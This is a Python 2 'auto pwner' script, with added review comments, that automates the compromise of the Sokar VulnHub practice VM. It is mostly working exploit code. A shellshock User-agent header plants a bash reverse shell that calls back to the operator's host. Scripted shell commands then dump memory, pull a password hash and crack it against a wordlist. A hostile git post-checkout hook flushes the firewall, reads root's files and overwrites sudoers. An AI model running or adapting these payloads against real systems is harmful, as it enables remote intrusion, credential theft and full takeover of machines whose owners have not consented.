#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Walkthrough automation for the "Sokar" VulnHub practice VM (see the banner below).
# Python 2 only: it uses `urllib2` and the `except X, e` syntax, so it will not
# parse under Python 3.
#
# NOTE(review): this script makes persistent changes to the machine it is *run on*
# (appends to /etc/hosts and /etc/ssh/sshd_config, restarts dnsmasq and ssh,
# creates and later deletes /root/secret-project) and expects to run as root.
# The `-p` value (the local root ssh password) is taken from the command line,
# so it is visible in process listings and shell history, and is later written
# over a plain TCP connection (see exploit()).
from __future__ import print_function
from subprocess import call      # unused in this file
from optparse import OptionParser
import socket, re, sys, urllib2, time, os, crypt   # `re` is also unused

print("\n===============================================================================================");
print("\t Sokar Auto Pwner");
print("\tAuthor : teh3ck")
print("\tTwitter: https://twitter.com/teh_h3ck")
print("\tEmail : teh3ck@gmail.com")
print("\tBlog : https://vagmour.eu")
print("\tOnly dependency: dnsmasq")
print("\tTested on Debian(Kali)/Ubuntu")
print("\tThanks @rasta_mouse and @Vulnhub for providing such challenges!")
print("===============================================================================================\n\n");

# TCP port of the target's web server; also used to build URL in __main__.
port = 591


def check_sokar(address, port): #checking if the sokar ip is correct
    """Return True if a TCP connection to (address, port) succeeds, else False.

    Only reachability is tested; nothing identifies the host as "Sokar".
    The socket is never closed on either path (no context manager / finally).
    """
    s = socket.socket()
    print("[+] Attempting to connect to " + address + " on port " + str(port))
    try:
        s.connect((address, port))
        return True
    except socket.error, e:   # Python 2 syntax; `e` is unused
        return False


def shell_sokar(URL,address,localip): # spawning a shell via shellshock bug
    """Send two HTTP requests to URL with a crafted User-agent header.

    The header carries a malformed bash function definition (the "shellshock"
    bug named in the original comment). The first request writes a one-line
    command into /home/bynarr/iostat on the target, the second marks that file
    executable. `address` is accepted but never used; `localip` is embedded in
    the first header so the target connects back to port 51242 on this host.
    Any exception from either request is printed and swallowed, so callers
    cannot tell whether the requests actually succeeded.
    """
    print("[+] Shellshocking on " + URL + " ...")
    opener=urllib2.build_opener()
    opener1=urllib2.build_opener()
    opener.addheaders=[('User-agent', '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/echo -e "/bin/bash -i >& /dev/tcp/'+localip+'/51242 0>&1" > /home/bynarr/iostat')]
    opener1.addheaders=[('User-agent', '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/chmod +x /home/bynarr/iostat')]
    try:
        print("[+] Writing payload to iostat file...")
        response=opener.open(URL)     # response bodies are never read or checked
        print("[+] Giving executing permissions to iostat file...")
        response1=opener1.open(URL)
    except Exception as e:
        print(e)


def bynarr(): # runnning the lime(memory dump) program
    """Wait for one inbound connection on 0.0.0.0:51242 and drive it with fixed commands.

    The listener binds all interfaces and has no timeout, so it blocks forever
    if nothing connects, and whoever connects first receives the commands.
    Each command is followed by a fixed sleep; nothing read back is checked, so
    failures on the remote side are invisible here. The last command runs the
    target's `lime` binary with the answer file created just before it.
    """
    s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", 51242))
    s.listen(5)
    # NOTE(review): in the original source this string literal contained a raw
    # line break here (a syntax error); it is written as "\n" below.
    print("[+] Listening on port 51242... \n")
    (client, (ip, port)) = s.accept()   # local `port` shadows the module-level one
    print("[+] Reverse connection succeeded from : ", ip)
    print("[+] Spawning a tty...")
    command = "python -c 'import pty; pty.spawn(" + "\"/bin/sh\")'\n"
    client.send(command.encode())
    time.sleep(1)
    print("[+] Creating file that contains the lime answer...")
    command = "echo 'add' > /tmp/add\n"
    client.send(command.encode())
    time.sleep(1)
    print("[+] Doing memory dump...")
    command = "sudo /home/bynarr/./lime < /tmp/add\n"
    client.send(command.encode())
    time.sleep(4)   # fixed wait for the dump; no completion signal is read
    client.close()
    s.close()


def forensics(URL): #extracting the hash from memory dump
    """Fetch /tmp/ram from the target via the same header trick and return the first line containing "apophis:$6$".

    Returns None when no such line is found or when the request fails (the
    exception is printed and swallowed). Callers must handle None; crack()
    currently does not (`":" in None` raises TypeError).
    The returned line is the raw line including its trailing newline.
    """
    opener=urllib2.build_opener()
    opener.addheaders=[('User-agent', '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /tmp/ram')]
    try:
        response=opener.open(URL)
        for line in response.readlines():   # reads the whole dump into memory
            if "apophis:$6$" in line:
                print("[+] Found apophis hash in memory dump")
                #with open('apophis.txt', 'w') as f:
                #    print(line, file=f)
                return line
    except Exception as e:
        print(e)


def testPass(cryptPass,wordlist): # cracking the apophis password
    """Try every line of `wordlist` against `cryptPass` with crypt(3); return the matching word or None.

    The salt is taken as the first 11 characters of cryptPass, which assumes a
    "$6$" hash with an 8-character salt — TODO confirm for other formats.
    The wordlist file is opened but never closed, and readlines() loads it
    whole into memory (rockyou.txt is the default). Each candidate hash is
    echoed to stdout, which dominates the running time for large lists.
    """
    salt = cryptPass[0:11]
    dictFile = open(wordlist,'r')
    for word in dictFile.readlines():
        word = word.strip('\n')
        cryptword = crypt.crypt(word,salt)
        sys.stdout.write("\r[+] Hash value: " + cryptword)
        sys.stdout.flush()
        if (cryptword == cryptPass) :
            print("\n[+] Found password: "+word)
            return word
    print("[-] Password not found.\n")
    return


def crack(hash, wordlist): # cracking the apophis password
    """Split a "user:hash..." line and hand the hash field to testPass().

    `hash` shadows the builtin of the same name. If the line has no ":" the
    function returns None without any message; if `hash` is None (forensics()
    found nothing) the `in` test raises TypeError.
    """
    #passw = open(apophis.txt)
    if ":" in hash:
        cryptPass = hash.split(':')[1].strip(' ')
        print("[+] Cracking password for: apophis")
        cracked = testPass(cryptPass,wordlist)
        return cracked


def dnmasq(local): # host machine as sokar-dev name resolution
    """Map the name "sokar-dev" to `local` in this host's /etc/hosts and (re)start dnsmasq.

    The check is a substring search over the whole file, so any existing
    mention of "sokar-dev" (e.g. a different address) suppresses the append.
    `killall dnsmasq; dnsmasq` is run through a shell with root privileges and
    its exit status is ignored.
    """
    with open('/etc/hosts', 'r+') as f:
        if 'sokar-dev' not in f.read():
            print(local + "\t" + "sokar-dev", file=f)
            print("[+] sokar-dev added in /etc/hosts file")
        else:
            print("[+] sokar-dev already in /etc/hosts file")
    os.system("killall dnsmasq; dnsmasq")


def git_exploit(localip): # r00t payload preparation in host
    """Prepare a git repository under /root/secret-project on this host.

    Side effects on the host running the script: a ListenAddress line for
    `localip` is appended to /etc/ssh/sshd_config (substring check only, same
    caveat as dnmasq()), and `service ssh start` is run at the end of the
    os.system() string. The repository's .Git/hooks/post-checkout file is
    written with the commands quoted in the string; where that hook is
    executed is not visible in this function. The directory is removed again
    by clean(), but the sshd_config change is not undone.
    """
    with open('/etc/ssh/sshd_config', 'r+') as f:
        if localip not in f.read():
            print("ListenAddress" + "\t" + localip, file=f)
            print("[+] ListenAddress added in /etc/ssh/sshd_config file")
        else:
            print("[+] ListenAddress already in /etc/ssh/sshd_config file")
    print("[+] Generating the r00t payload locally...")
    os.system("""mkdir -p /root/secret-project/.Git/hooks/; git init /root/secret-project/; echo 'service sshd start\niptables -F\ncat /root/*\necho "apophis ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers' > /root/secret-project/.Git/hooks/post-checkout; cd /root/secret-project/; git add .; git commit -m 'pwned' -q; service ssh start""")


def exploit(localip,sshpasswd, cracked): # r00t exploit
    """Wait for a second inbound connection on 0.0.0.0:51242 and drive it with a fixed command sequence.

    Same listener caveats as bynarr(): all interfaces, no timeout, first
    connection wins. `cracked` (the password recovered by crack()) and
    `sshpasswd` (this host's root ssh password from `-p`) are both written to
    the socket in cleartext. Every recv() result except the last is discarded,
    and progress relies purely on sleep() intervals, so a slow target silently
    desynchronises the sequence. If `cracked` is None the concatenation on the
    "Logging in" step raises TypeError after the connection was accepted.
    """
    s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", 51242))
    s.listen(5)
    print("[+] Listening on port 51242... ")
    (client, (ip, port)) = s.accept()   # local `port` shadows the module-level one
    print("[+] Reverse connection succeeded from : ", ip)
    print("[+] Spawning a tty...")
    command = "python -c 'import pty; pty.spawn(" + "\"/bin/sh\")'\n"
    client.send(command.encode())
    time.sleep(1)
    print("[+] Getting interactive shell...")
    command = "su apophis\n"
    client.send(command.encode())
    client.recv(1024)
    time.sleep(.5)
    print("[+] Logging in as apophis...")
    command = cracked + "\n"
    client.send(command.encode())
    client.recv(1024)
    time.sleep(.5)
    command = "rm -rf /mnt/secret-project\n" #in case it's already created in server
    client.send(command.encode())
    client.recv(1024)
    time.sleep(.5)
    command = "echo 'Y' > /tmp/yes\n"
    client.send(command.encode())
    time.sleep(.5)
    print("[+] Adding nameserver to the /etc/resolv.conf...")
    # Points the target's resolver at this host, where dnmasq() started dnsmasq.
    resolv = "nameserver " + localip
    command = "echo " + resolv + " > /etc/resolv.conf\n"
    client.send(command.encode())
    client.recv(1024)
    time.sleep(.5)
    command = "~/./build < /tmp/yes\n"
    client.send(command.encode())
    client.recv(1024)
    time.sleep(3)
    command = "YES\n" #capitals to not run the yes program
    client.send(command.encode())
    time.sleep(3)
    client.recv(1024)
    command = sshpasswd + "\r\r"   # local root ssh password, sent in cleartext
    client.send(command.encode())
    time.sleep(1)
    print(client.recv(4096))   # only output that is ever shown to the operator
    client.close()
    s.close()


def clean():
    """Remove the /root/secret-project directory created by git_exploit() on this host."""
    os.system("rm -rf /root/secret-project")


if __name__ == '__main__':
    parser = OptionParser(description="Sokar Auto Pwner by teh3ck")
    parser.add_option("-a", "--address", dest="address", help="Sokar ip address", metavar="ADDRESS")
    parser.add_option("-l", "--localip", dest="localip", help="Local ip address", metavar="LOCAL")
    parser.add_option("-w", "--wordlist", dest="wordlist", default="/usr/share/wordlists/rockyou.txt", help="Path for wordlist file", metavar="WORDLIST")
    parser.add_option("-p", "--password", dest="sshpasswd", help="Give your local root ssh pass", metavar="SSHPASS")
    (options, args) = parser.parse_args()
    if (options.address == None or options.localip == None or options.sshpasswd == None):
        parser.print_help()
        # BUG: `exit` is referenced but not called, so execution falls through to
        # sys.exit(not check) below with `check` unbound -> NameError.
        exit
    else:
        URL="http://"+str(options.address)+":591/cgi-bin/cat"
        check = check_sokar(options.address, port)
        if check == True:
            print("[+] Attacking Sokar")
            shell_sokar(URL,options.address,options.localip)
            bynarr()
            hash = forensics(URL)            # may be None; see forensics()/crack()
            cracked = crack(hash, options.wordlist)
            dnmasq(options.localip)
            git_exploit(options.localip)
            exploit(options.localip,options.sshpasswd, cracked)
            check = check_sokar(options.address, 22)   # only tests that port 22 now accepts connections
            print("[+] Removing secret-project directory from your system...")
            clean()
            if check == True:
                print("[+] ssh apophis@" + options.address)
                print("[+] Password: overdrive")   # hard-coded; the recovered value is in `cracked`
                print("[+] $sudo su")
                print("[+] W00T")
        else:
            print("That ip isn't sokar")
    sys.exit(not check)